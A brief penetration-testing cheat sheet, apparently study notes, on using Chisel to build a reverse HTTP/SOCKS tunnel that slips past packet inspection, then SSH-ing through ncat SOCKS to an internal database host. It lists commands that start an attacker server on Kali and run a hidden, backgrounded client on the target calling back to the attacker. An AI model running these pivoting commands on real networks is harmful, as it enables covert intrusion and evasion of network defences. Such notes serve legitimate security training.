- Good for when only http is allowed
- Can't use SSH tunnel because of packet inspection
- Chisel creates a HTTP tunnel with SSH inside for encryption
- Chisel exists for all OSes and architectures which other tools like HTTPTunnel does not
- Chisel server listens on TCP port 1080 which is a SOCKS port
Chisel HTTP Dynamic/Reverse Port Forwarding + SSH with SOCKS:
- Get correct binary to target machine from https://github.com/jpillora/chisel/releases/
- Start Chisel server on kali:
chisel server --port 8080 --reverse
- Connect to server using Chisel client:
/tmp/chisel client 192.168.45.180:8080 R:socks > /dev/null 2>&1 &
- Connect using SOCKS and win!
- SSH with SOCKS using ncat:
ssh -o ProxyCommand='ncat --proxy-type socks5 --proxy 127.0.0.1:1080 %h %p' database_admin@10.4.50.215